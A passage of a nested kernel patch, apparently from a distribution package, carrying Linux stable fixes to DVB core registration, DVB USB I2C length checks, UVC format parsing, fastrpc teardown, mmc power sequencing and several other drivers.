++	 * the first allocated fops are used. This prevents memory leaks
++	 * that can occur when the same device is probe()d repeatedly.
++	 */
++	list_for_each_entry(node, &dvbdevfops_list, list_head) {
++		if (node->fops->owner == adap->module &&
++				node->type == type &&
++				node->template == template) {
++			dvbdevfops = node->fops;
++			break;
++		}
++	}
+ 
+-	if (!dvbdevfops){
+-		kfree (dvbdev);
+-		mutex_unlock(&dvbdev_register_lock);
+-		return -ENOMEM;
++	if (dvbdevfops == NULL) {
++		dvbdevfops = kmemdup(template->fops, sizeof(*dvbdevfops), GFP_KERNEL);
++		if (!dvbdevfops) {
++			kfree(dvbdev);
++			mutex_unlock(&dvbdev_register_lock);
++			return -ENOMEM;
++		}
++
++		new_node = kzalloc(sizeof(struct dvbdevfops_node), GFP_KERNEL);
++		if (!new_node) {
++			kfree(dvbdevfops);
++			kfree(dvbdev);
++			mutex_unlock(&dvbdev_register_lock);
++			return -ENOMEM;
++		}
++
++		new_node->fops = dvbdevfops;
++		new_node->type = type;
++		new_node->template = template;
++		list_add_tail (&new_node->list_head, &dvbdevfops_list);
+ 	}
+ 
+ 	memcpy(dvbdev, template, sizeof(struct dvb_device));
+@@ -489,20 +518,20 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 	dvbdev->priv = priv;
+ 	dvbdev->fops = dvbdevfops;
+ 	init_waitqueue_head (&dvbdev->wait_queue);
+-
+ 	dvbdevfops->owner = adap->module;
+-
+ 	list_add_tail (&dvbdev->list_head, &adap->device_list);
+-
+ 	down_write(&minor_rwsem);
+ #ifdef CONFIG_DVB_DYNAMIC_MINORS
+ 	for (minor = 0; minor < MAX_DVB_MINORS; minor++)
+ 		if (dvb_minors[minor] == NULL)
+ 			break;
+-
+ 	if (minor == MAX_DVB_MINORS) {
++		if (new_node) {
++			list_del (&new_node->list_head);
++			kfree(dvbdevfops);
++			kfree(new_node);
++		}
+ 		list_del (&dvbdev->list_head);
+-		kfree(dvbdevfops);
+ 		kfree(dvbdev);
+ 		up_write(&minor_rwsem);
+ 		mutex_unlock(&dvbdev_register_lock);
+@@ -511,41 +540,47 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ #else
+ 	minor = nums2minor(adap->num, type, id);
+ #endif
+-
+ 	dvbdev->minor = minor;
+ 	dvb_minors[minor] = dvb_device_get(dvbdev);
+ 	up_write(&minor_rwsem);
+-
+ 	ret = dvb_register_media_device(dvbdev, type, minor, demux_sink_pads);
+ 	if (ret) {
+ 		pr_err("%s: dvb_register_media_device failed to create the mediagraph\n",
+ 		      __func__);
+-
++		if (new_node) {
++			list_del (&new_node->list_head);
++			kfree(dvbdevfops);
++			kfree(new_node);
++		}
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+-		kfree(dvbdevfops);
+ 		kfree(dvbdev);
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return ret;
+ 	}
+ 
+-	mutex_unlock(&dvbdev_register_lock);
+-
+ 	clsdev = device_create(dvb_class, adap->device,
+ 			       MKDEV(DVB_MAJOR, minor),
+ 			       dvbdev, "dvb%d.%s%d", adap->num, dnames[type], id);
+ 	if (IS_ERR(clsdev)) {
+ 		pr_err("%s: failed to create device dvb%d.%s%d (%ld)\n",
+ 		       __func__, adap->num, dnames[type], id, PTR_ERR(clsdev));
++		if (new_node) {
++			list_del (&new_node->list_head);
++			kfree(dvbdevfops);
++			kfree(new_node);
++		}
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+-		kfree(dvbdevfops);
+ 		kfree(dvbdev);
++		mutex_unlock(&dvbdev_register_lock);
+ 		return PTR_ERR(clsdev);
+ 	}
++
+ 	dprintk("DVB: register adapter%d/%s%d @ minor: %i (0x%02x)\n",
+ 		adap->num, dnames[type], id, minor, minor);
+ 
++	mutex_unlock(&dvbdev_register_lock);
+ 	return 0;
+ }
+ EXPORT_SYMBOL(dvb_register_device);
+@@ -574,7 +609,6 @@ static void dvb_free_device(struct kref *ref)
+ {
+ 	struct dvb_device *dvbdev = container_of(ref, struct dvb_device, ref);
+ 
+-	kfree (dvbdev->fops);
+ 	kfree (dvbdev);
+ }
+ 
+@@ -1080,9 +1114,17 @@ error:
+ 
+ static void __exit exit_dvbdev(void)
+ {
++	struct dvbdevfops_node *node, *next;
++
+ 	class_destroy(dvb_class);
+ 	cdev_del(&dvb_device_cdev);
+ 	unregister_chrdev_region(MKDEV(DVB_MAJOR, 0), MAX_DVB_MINORS);
++
++	list_for_each_entry_safe(node, next, &dvbdevfops_list, list_head) {
++		list_del (&node->list_head);
++		kfree(node->fops);
++		kfree(node);
++	}
+ }
+ 
+ subsys_initcall(init_dvbdev);
+diff --git a/drivers/media/dvb-frontends/mn88443x.c b/drivers/media/dvb-frontends/mn88443x.c
+index 452571b380b72..5a024870979de 100644
+--- a/drivers/media/dvb-frontends/mn88443x.c
++++ b/drivers/media/dvb-frontends/mn88443x.c
+@@ -798,7 +798,7 @@ MODULE_DEVICE_TABLE(i2c, mn88443x_i2c_id);
+ static struct i2c_driver mn88443x_driver = {
+ 	.driver = {
+ 		.name = "mn88443x",
+-		.of_match_table = of_match_ptr(mn88443x_of_match),
++		.of_match_table = mn88443x_of_match,
+ 	},
+ 	.probe    = mn88443x_probe,
+ 	.remove   = mn88443x_remove,
+diff --git a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+index aaa1d2dedebdd..d85bfbb77a250 100644
+--- a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
++++ b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+@@ -887,12 +887,7 @@ static int netup_unidvb_initdev(struct pci_dev *pci_dev,
+ 		ndev->lmmio0, (u32)pci_resource_len(pci_dev, 0),
+ 		ndev->lmmio1, (u32)pci_resource_len(pci_dev, 1),
+ 		pci_dev->irq);
+-	if (request_irq(pci_dev->irq, netup_unidvb_isr, IRQF_SHARED,
+-			"netup_unidvb", pci_dev) < 0) {
+-		dev_err(&pci_dev->dev,
+-			"%s(): can't get IRQ %d\n", __func__, pci_dev->irq);
+-		goto irq_request_err;
+-	}
++
+ 	ndev->dma_size = 2 * 188 *
+ 		NETUP_DMA_BLOCKS_COUNT * NETUP_DMA_PACKETS_COUNT;
+ 	ndev->dma_virt = dma_alloc_coherent(&pci_dev->dev,
+@@ -933,6 +928,14 @@ static int netup_unidvb_initdev(struct pci_dev *pci_dev,
+ 		dev_err(&pci_dev->dev, "netup_unidvb: DMA setup failed\n");
+ 		goto dma_setup_err;
+ 	}
++
++	if (request_irq(pci_dev->irq, netup_unidvb_isr, IRQF_SHARED,
++			"netup_unidvb", pci_dev) < 0) {
++		dev_err(&pci_dev->dev,
++			"%s(): can't get IRQ %d\n", __func__, pci_dev->irq);
++		goto dma_setup_err;
++	}
++
+ 	dev_info(&pci_dev->dev,
+ 		"netup_unidvb: device has been initialized\n");
+ 	return 0;
+@@ -951,8 +954,6 @@ spi_setup_err:
+ 	dma_free_coherent(&pci_dev->dev, ndev->dma_size,
+ 			ndev->dma_virt, ndev->dma_phys);
+ dma_alloc_err:
+-	free_irq(pci_dev->irq, pci_dev);
+-irq_request_err:
+ 	iounmap(ndev->lmmio1);
+ pci_bar1_error:
+ 	iounmap(ndev->lmmio0);
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+index 29991551cf614..0fbd030026c72 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+@@ -584,6 +584,9 @@ static void mtk_init_vdec_params(struct mtk_vcodec_ctx *ctx)
+ 
+ 	if (!(ctx->dev->dec_capability & VCODEC_CAPABILITY_4K_DISABLED)) {
+ 		for (i = 0; i < num_supported_formats; i++) {
++			if (mtk_video_formats[i].type != MTK_FMT_DEC)
++				continue;
++
+ 			mtk_video_formats[i].frmsize.max_width =
+ 				VCODEC_DEC_4K_CODED_WIDTH;
+ 			mtk_video_formats[i].frmsize.max_height =
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+index 3aea96d85165a..ef5adffae1972 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+@@ -651,11 +651,9 @@ static int rvin_setup(struct rvin_dev *vin)
+ 	case V4L2_FIELD_SEQ_TB:
+ 	case V4L2_FIELD_SEQ_BT:
+ 	case V4L2_FIELD_NONE:
+-		vnmc = VNMC_IM_ODD_EVEN;
+-		progressive = true;
+-		break;
+ 	case V4L2_FIELD_ALTERNATE:
+ 		vnmc = VNMC_IM_ODD_EVEN;
++		progressive = true;
+ 		break;
+ 	default:
+ 		vnmc = VNMC_IM_ODD;
+diff --git a/drivers/media/usb/dvb-usb-v2/ce6230.c b/drivers/media/usb/dvb-usb-v2/ce6230.c
+index 44540de1a2066..d3b5cb4a24daf 100644
+--- a/drivers/media/usb/dvb-usb-v2/ce6230.c
++++ b/drivers/media/usb/dvb-usb-v2/ce6230.c
+@@ -101,6 +101,10 @@ static int ce6230_i2c_master_xfer(struct i2c_adapter *adap,
+ 		if (num > i + 1 && (msg[i+1].flags & I2C_M_RD)) {
+ 			if (msg[i].addr ==
+ 				ce6230_zl10353_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = DEMOD_READ;
+ 				req.value = msg[i].addr >> 1;
+ 				req.index = msg[i].buf[0];
+@@ -117,6 +121,10 @@ static int ce6230_i2c_master_xfer(struct i2c_adapter *adap,
+ 		} else {
+ 			if (msg[i].addr ==
+ 				ce6230_zl10353_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = DEMOD_WRITE;
+ 				req.value = msg[i].addr >> 1;
+ 				req.index = msg[i].buf[0];
+diff --git a/drivers/media/usb/dvb-usb-v2/ec168.c b/drivers/media/usb/dvb-usb-v2/ec168.c
+index 7ed0ab9e429b1..0e4773fc025c9 100644
+--- a/drivers/media/usb/dvb-usb-v2/ec168.c
++++ b/drivers/media/usb/dvb-usb-v2/ec168.c
+@@ -115,6 +115,10 @@ static int ec168_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 	while (i < num) {
+ 		if (num > i + 1 && (msg[i+1].flags & I2C_M_RD)) {
+ 			if (msg[i].addr == ec168_ec100_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = READ_DEMOD;
+ 				req.value = 0;
+ 				req.index = 0xff00 + msg[i].buf[0]; /* reg */
+@@ -131,6 +135,10 @@ static int ec168_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			}
+ 		} else {
+ 			if (msg[i].addr == ec168_ec100_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = WRITE_DEMOD;
+ 				req.value = msg[i].buf[1]; /* val */
+ 				req.index = 0xff00 + msg[i].buf[0]; /* reg */
+@@ -139,6 +147,10 @@ static int ec168_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				ret = ec168_ctrl_msg(d, &req);
+ 				i += 1;
+ 			} else {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = WRITE_I2C;
+ 				req.value = msg[i].buf[0]; /* val */
+ 				req.index = 0x0100 + msg[i].addr; /* I2C addr */
+diff --git a/drivers/media/usb/dvb-usb-v2/rtl28xxu.c b/drivers/media/usb/dvb-usb-v2/rtl28xxu.c
+index 795a012d40200..f7884bb56fccf 100644
+--- a/drivers/media/usb/dvb-usb-v2/rtl28xxu.c
++++ b/drivers/media/usb/dvb-usb-v2/rtl28xxu.c
+@@ -176,6 +176,10 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			ret = -EOPNOTSUPP;
+ 			goto err_mutex_unlock;
+ 		} else if (msg[0].addr == 0x10) {
++			if (msg[0].len < 1 || msg[1].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 1 - integrated demod */
+ 			if (msg[0].buf[0] == 0x00) {
+ 				/* return demod page from driver cache */
+@@ -189,6 +193,10 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				ret = rtl28xxu_ctrl_msg(d, &req);
+ 			}
+ 		} else if (msg[0].len < 2) {
++			if (msg[0].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 2 - old I2C */
+ 			req.value = (msg[0].buf[0] << 8) | (msg[0].addr << 1);
+ 			req.index = CMD_I2C_RD;
+@@ -217,8 +225,16 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			ret = -EOPNOTSUPP;
+ 			goto err_mutex_unlock;
+ 		} else if (msg[0].addr == 0x10) {
++			if (msg[0].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 1 - integrated demod */
+ 			if (msg[0].buf[0] == 0x00) {
++				if (msg[0].len < 2) {
++					ret = -EOPNOTSUPP;
++					goto err_mutex_unlock;
++				}
+ 				/* save demod page for later demod access */
+ 				dev->page = msg[0].buf[1];
+ 				ret = 0;
+@@ -231,6 +247,10 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				ret = rtl28xxu_ctrl_msg(d, &req);
+ 			}
+ 		} else if ((msg[0].len < 23) && (!dev->new_i2c_write)) {
++			if (msg[0].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 2 - old I2C */
+ 			req.value = (msg[0].buf[0] << 8) | (msg[0].addr << 1);
+ 			req.index = CMD_I2C_WR;
+diff --git a/drivers/media/usb/dvb-usb/az6027.c b/drivers/media/usb/dvb-usb/az6027.c
+index 7d78ee09be5e1..a31c6f82f4e90 100644
+--- a/drivers/media/usb/dvb-usb/az6027.c
++++ b/drivers/media/usb/dvb-usb/az6027.c
+@@ -988,6 +988,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 			/* write/read request */
+ 			if (i + 1 < num && (msg[i + 1].flags & I2C_M_RD)) {
+ 				req = 0xB9;
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				index = (((msg[i].buf[0] << 8) & 0xff00) | (msg[i].buf[1] & 0x00ff));
+ 				value = msg[i].addr + (msg[i].len << 8);
+ 				length = msg[i + 1].len + 6;
+@@ -1001,6 +1005,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 
+ 				/* demod 16bit addr */
+ 				req = 0xBD;
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				index = (((msg[i].buf[0] << 8) & 0xff00) | (msg[i].buf[1] & 0x00ff));
+ 				value = msg[i].addr + (2 << 8);
+ 				length = msg[i].len - 2;
+@@ -1026,6 +1034,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 			} else {
+ 
+ 				req = 0xBD;
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				index = msg[i].buf[0] & 0x00FF;
+ 				value = msg[i].addr + (1 << 8);
+ 				length = msg[i].len - 1;
+diff --git a/drivers/media/usb/dvb-usb/digitv.c b/drivers/media/usb/dvb-usb/digitv.c
+index 2756815a780bc..32134be169148 100644
+--- a/drivers/media/usb/dvb-usb/digitv.c
++++ b/drivers/media/usb/dvb-usb/digitv.c
+@@ -63,6 +63,10 @@ static int digitv_i2c_xfer(struct i2c_adapter *adap,struct i2c_msg msg[],int num
+ 		warn("more than 2 i2c messages at a time is not handled yet. TODO.");
+ 
+ 	for (i = 0; i < num; i++) {
++		if (msg[i].len < 1) {
++			i = -EOPNOTSUPP;
++			break;
++		}
+ 		/* write/read request */
+ 		if (i+1 < num && (msg[i+1].flags & I2C_M_RD)) {
+ 			if (digitv_ctrl_msg(d, USB_READ_COFDM, msg[i].buf[0], NULL, 0,
+diff --git a/drivers/media/usb/dvb-usb/dw2102.c b/drivers/media/usb/dvb-usb/dw2102.c
+index 0ca764282c767..8747960e61461 100644
+--- a/drivers/media/usb/dvb-usb/dw2102.c
++++ b/drivers/media/usb/dvb-usb/dw2102.c
+@@ -946,7 +946,7 @@ static int su3000_read_mac_address(struct dvb_usb_device *d, u8 mac[6])
+ 	for (i = 0; i < 6; i++) {
+ 		obuf[1] = 0xf0 + i;
+ 		if (i2c_transfer(&d->i2c_adap, msg, 2) != 2)
+-			break;
++			return -1;
+ 		else
+ 			mac[i] = ibuf[0];
+ 	}
+diff --git a/drivers/media/usb/ttusb-dec/ttusb_dec.c b/drivers/media/usb/ttusb-dec/ttusb_dec.c
+index 38822cedd93a9..c4474d4c44e28 100644
+--- a/drivers/media/usb/ttusb-dec/ttusb_dec.c
++++ b/drivers/media/usb/ttusb-dec/ttusb_dec.c
+@@ -1544,8 +1544,7 @@ static void ttusb_dec_exit_dvb(struct ttusb_dec *dec)
+ 	dvb_dmx_release(&dec->demux);
+ 	if (dec->fe) {
+ 		dvb_unregister_frontend(dec->fe);
+-		if (dec->fe->ops.release)
+-			dec->fe->ops.release(dec->fe);
++		dvb_frontend_detach(dec->fe);
+ 	}
+ 	dvb_unregister_adapter(&dec->adapter);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index a9cdef07e6b14..191db831d7606 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -251,14 +251,17 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		/* Find the format descriptor from its GUID. */
+ 		fmtdesc = uvc_format_by_guid(&buffer[5]);
+ 
+-		if (fmtdesc != NULL) {
+-			format->fcc = fmtdesc->fcc;
+-		} else {
++		if (!fmtdesc) {
++			/*
+			 * Unknown video formats are not fatal errors; the
++			 * caller will skip this descriptor.
++			 */
+ 			dev_info(&streaming->intf->dev,
+ 				 "Unknown video format %pUl\n", &buffer[5]);
+-			format->fcc = 0;
++			return 0;
+ 		}
+ 
++		format->fcc = fmtdesc->fcc;
+ 		format->bpp = buffer[21];
+ 
+ 		/*
+@@ -675,7 +678,7 @@ static int uvc_parse_streaming(struct uvc_device *dev,
+ 	interval = (u32 *)&frame[nframes];
+ 
+ 	streaming->format = format;
+-	streaming->nformats = nformats;
++	streaming->nformats = 0;
+ 
+ 	/* Parse the format descriptors. */
+ 	while (buflen > 2 && buffer[1] == USB_DT_CS_INTERFACE) {
+@@ -689,7 +692,10 @@ static int uvc_parse_streaming(struct uvc_device *dev,
+ 				&interval, buffer, buflen);
+ 			if (ret < 0)
+ 				goto error;
++			if (!ret)
++				break;
+ 
++			streaming->nformats++;
+ 			frame += format->nframes;
+ 			format++;
+ 
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 02d26160c64e6..8b1e8661c3d73 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2149,8 +2149,10 @@ static void fastrpc_notify_users(struct fastrpc_user *user)
+ 	struct fastrpc_invoke_ctx *ctx;
+ 
+ 	spin_lock(&user->lock);
+-	list_for_each_entry(ctx, &user->pending, node)
++	list_for_each_entry(ctx, &user->pending, node) {
++		ctx->retval = -EPIPE;
+ 		complete(&ctx->work);
++	}
+ 	spin_unlock(&user->lock);
+ }
+ 
+@@ -2160,7 +2162,9 @@ static void fastrpc_rpmsg_remove(struct rpmsg_device *rpdev)
+ 	struct fastrpc_user *user;
+ 	unsigned long flags;
+ 
++	/* No invocations past this point */
+ 	spin_lock_irqsave(&cctx->lock, flags);
++	cctx->rpdev = NULL;
+ 	list_for_each_entry(user, &cctx->users, user)
+ 		fastrpc_notify_users(user);
+ 	spin_unlock_irqrestore(&cctx->lock, flags);
+@@ -2173,7 +2177,6 @@ static void fastrpc_rpmsg_remove(struct rpmsg_device *rpdev)
+ 
+ 	of_platform_depopulate(&rpdev->dev);
+ 
+-	cctx->rpdev = NULL;
+ 	fastrpc_channel_ctx_put(cctx);
+ }
+ 
+diff --git a/drivers/mmc/core/pwrseq_sd8787.c b/drivers/mmc/core/pwrseq_sd8787.c
+index 2e120ad83020f..0c5f5e371e1f8 100644
+--- a/drivers/mmc/core/pwrseq_sd8787.c
++++ b/drivers/mmc/core/pwrseq_sd8787.c
+@@ -28,7 +28,6 @@ struct mmc_pwrseq_sd8787 {
+ 	struct mmc_pwrseq pwrseq;
+ 	struct gpio_desc *reset_gpio;
+ 	struct gpio_desc *pwrdn_gpio;
+-	u32 reset_pwrdwn_delay_ms;
+ };
+ 
+ #define to_pwrseq_sd8787(p) container_of(p, struct mmc_pwrseq_sd8787, pwrseq)
+@@ -39,7 +38,7 @@ static void mmc_pwrseq_sd8787_pre_power_on(struct mmc_host *host)
+ 
+ 	gpiod_set_value_cansleep(pwrseq->reset_gpio, 1);
+ 
+-	msleep(pwrseq->reset_pwrdwn_delay_ms);
++	msleep(300);
+ 	gpiod_set_value_cansleep(pwrseq->pwrdn_gpio, 1);
+ }
+ 
+@@ -51,17 +50,37 @@ static void mmc_pwrseq_sd8787_power_off(struct mmc_host *host)
+ 	gpiod_set_value_cansleep(pwrseq->reset_gpio, 0);
+ }
+ 
++static void mmc_pwrseq_wilc1000_pre_power_on(struct mmc_host *host)
++{
++	struct mmc_pwrseq_sd8787 *pwrseq = to_pwrseq_sd8787(host->pwrseq);
++
++	/* The pwrdn_gpio is really CHIP_EN, reset_gpio is RESETN */
++	gpiod_set_value_cansleep(pwrseq->pwrdn_gpio, 1);
++	msleep(5);
++	gpiod_set_value_cansleep(pwrseq->reset_gpio, 1);
++}
++
++static void mmc_pwrseq_wilc1000_power_off(struct mmc_host *host)
++{
++	struct mmc_pwrseq_sd8787 *pwrseq = to_pwrseq_sd8787(host->pwrseq);
++
++	gpiod_set_value_cansleep(pwrseq->reset_gpio, 0);
++	gpiod_set_value_cansleep(pwrseq->pwrdn_gpio, 0);
++}
++
+ static const struct mmc_pwrseq_ops mmc_pwrseq_sd8787_ops = {
+ 	.pre_power_on = mmc_pwrseq_sd8787_pre_power_on,
+ 	.power_off = mmc_pwrseq_sd8787_power_off,
+ };
+ 
+-static const u32 sd8787_delay_ms = 300;
+-static const u32 wilc1000_delay_ms = 5;
++static const struct mmc_pwrseq_ops mmc_pwrseq_wilc1000_ops = {
++	.pre_power_on = mmc_pwrseq_wilc1000_pre_power_on,
++	.power_off = mmc_pwrseq_wilc1000_power_off,
++};
+ 
+ static const struct of_device_id mmc_pwrseq_sd8787_of_match[] = {
+-	{ .compatible = "mmc-pwrseq-sd8787", .data = &sd8787_delay_ms },
+-	{ .compatible = "mmc-pwrseq-wilc1000", .data = &wilc1000_delay_ms },
++	{ .compatible = "mmc-pwrseq-sd8787", .data = &mmc_pwrseq_sd8787_ops },
++	{ .compatible = "mmc-pwrseq-wilc1000", .data = &mmc_pwrseq_wilc1000_ops },
+ 	{/* sentinel */},
+ };
+ MODULE_DEVICE_TABLE(of, mmc_pwrseq_sd8787_of_match);
+@@ -77,7 +96,6 @@ static int mmc_pwrseq_sd8787_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	match = of_match_node(mmc_pwrseq_sd8787_of_match, pdev->dev.of_node);
+-	pwrseq->reset_pwrdwn_delay_ms = *(u32 *)match->data;
+ 
+ 	pwrseq->pwrdn_gpio = devm_gpiod_get(dev, "powerdown", GPIOD_OUT_LOW);
+ 	if (IS_ERR(pwrseq->pwrdn_gpio))
+@@ -88,7 +106,7 @@ static int mmc_pwrseq_sd8787_probe(struct platform_device *pdev)
+ 		return PTR_ERR(pwrseq->reset_gpio);
+ 
+ 	pwrseq->pwrseq.dev = dev;
+-	pwrseq->pwrseq.ops = &mmc_pwrseq_sd8787_ops;
++	pwrseq->pwrseq.ops = match->data;
+ 	pwrseq->pwrseq.owner = THIS_MODULE;
+ 	platform_set_drvdata(pdev, pwrseq);
+ 
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index 72f65f32abbc7..7dc0e91dabfc7 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -1715,6 +1715,9 @@ static void construct_request_response(struct vub300_mmc_host *vub300,
+ 	int bytes = 3 & less_cmd;
+ 	int words = less_cmd >> 2;
+ 	u8 *r = vub300->resp.response.command_response;
++
++	if (!resp_len)
++		return;
+ 	if (bytes == 3) {
+ 		cmd->resp[words] = (r[1 + (words << 2)] << 24)
+ 			| (r[2 + (words << 2)] << 16)
+diff --git a/drivers/mtd/mtdchar.c b/drivers/mtd/mtdchar.c
+index 01f1c6792df9c..8dc4f5c493fcb 100644
+--- a/drivers/mtd/mtdchar.c
++++ b/drivers/mtd/mtdchar.c
+@@ -590,8 +590,8 @@ static void adjust_oob_length(struct mtd_info *mtd, uint64_t start,
+ 			    (end_page - start_page + 1) * oob_per_page);
+ }
+ 
+-static int mtdchar_write_ioctl(struct mtd_info *mtd,
+-		struct mtd_write_req __user *argp)
++static noinline_for_stack int
++mtdchar_write_ioctl(struct mtd_info *mtd, struct mtd_write_req __user *argp)
+ {
+ 	struct mtd_info *master = mtd_get_master(mtd);
+ 	struct mtd_write_req req;
+@@ -688,8 +688,8 @@ static int mtdchar_write_ioctl(struct mtd_info *mtd,
+ 	return ret;
+ }
+ 
+-static int mtdchar_read_ioctl(struct mtd_info *mtd,
+-		struct mtd_read_req __user *argp)
++static noinline_for_stack int
++mtdchar_read_ioctl(struct mtd_info *mtd, struct mtd_read_req __user *argp)
+ {
+ 	struct mtd_info *master = mtd_get_master(mtd);
+ 	struct mtd_read_req req;
+diff --git a/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h b/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h
+index 2cda439b5e11b..017868f59f222 100644
+--- a/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h
++++ b/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h
+@@ -36,25 +36,25 @@ int ingenic_ecc_correct(struct ingenic_ecc *ecc,
+ void ingenic_ecc_release(struct ingenic_ecc *ecc);
+ struct ingenic_ecc *of_ingenic_ecc_get(struct device_node *np);
+ #else /* CONFIG_MTD_NAND_INGENIC_ECC */
+-int ingenic_ecc_calculate(struct ingenic_ecc *ecc,
++static inline int ingenic_ecc_calculate(struct ingenic_ecc *ecc,
+ 			  struct ingenic_ecc_params *params,
+ 			  const u8 *buf, u8 *ecc_code)
+ {
+ 	return -ENODEV;
+ }
+ 
+-int ingenic_ecc_correct(struct ingenic_ecc *ecc,
++static inline int ingenic_ecc_correct(struct ingenic_ecc *ecc,
+ 			struct ingenic_ecc_params *params, u8 *buf,
+ 			u8 *ecc_code)
+ {
+ 	return -ENODEV;
+ }
+ 
+-void ingenic_ecc_release(struct ingenic_ecc *ecc)
++static inline void ingenic_ecc_release(struct ingenic_ecc *ecc)
+ {
+ }
+ 
+-struct ingenic_ecc *of_ingenic_ecc_get(struct device_node *np)
++static inline struct ingenic_ecc *of_ingenic_ecc_get(struct device_node *np)
+ {
+ 	return ERR_PTR(-ENODEV);
+ }
+diff --git a/drivers/mtd/nand/raw/marvell_nand.c b/drivers/mtd/nand/raw/marvell_nand.c
+index b9d1e96e33345..a57a1501449aa 100644
+--- a/drivers/mtd/nand/raw/marvell_nand.c
++++ b/drivers/mtd/nand/raw/marvell_nand.c
+@@ -2449,6 +2449,12 @@ static int marvell_nfc_setup_interface(struct nand_chip *chip, int chipnr,
+ 			NDTR1_WAIT_MODE;
+ 	}
+ 
++	/*
++	 * Reset nfc->selected_chip so the next command will cause the timing
++	 * registers to be updated in marvell_nfc_select_target().
++	 */
++	nfc->selected_chip = NULL;
++
+ 	return 0;
+ }
+ 
+@@ -2885,10 +2891,6 @@ static int marvell_nfc_init(struct marvell_nfc *nfc)
+ 		regmap_update_bits(sysctrl_base, GENCONF_CLK_GATING_CTRL,
+ 				   GENCONF_CLK_GATING_CTRL_ND_GATE,
+ 				   GENCONF_CLK_GATING_CTRL_ND_GATE);
+-
+-		regmap_update_bits(sysctrl_base, GENCONF_ND_CLK_CTRL,
+-				   GENCONF_ND_CLK_CTRL_EN,
+-				   GENCONF_ND_CLK_CTRL_EN);
+ 	}
+ 
+ 	/* Configure the DMA if appropriate */
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index a8ff6ee6d58e6..4db1652015d1d 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -7067,7 +7067,7 @@ static int mv88e6xxx_probe(struct mdio_device *mdiodev)
+ 		goto out;
+ 	}
+ 	if (chip->reset)
+-		usleep_range(1000, 2000);
++		usleep_range(10000, 20000);
+ 
+ 	/* Detect if the device is configured in single chip addressing mode,
+ 	 * otherwise continue with address specific smi init/detection.
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index 43fdd111235a6..ca7372369b3e6 100644
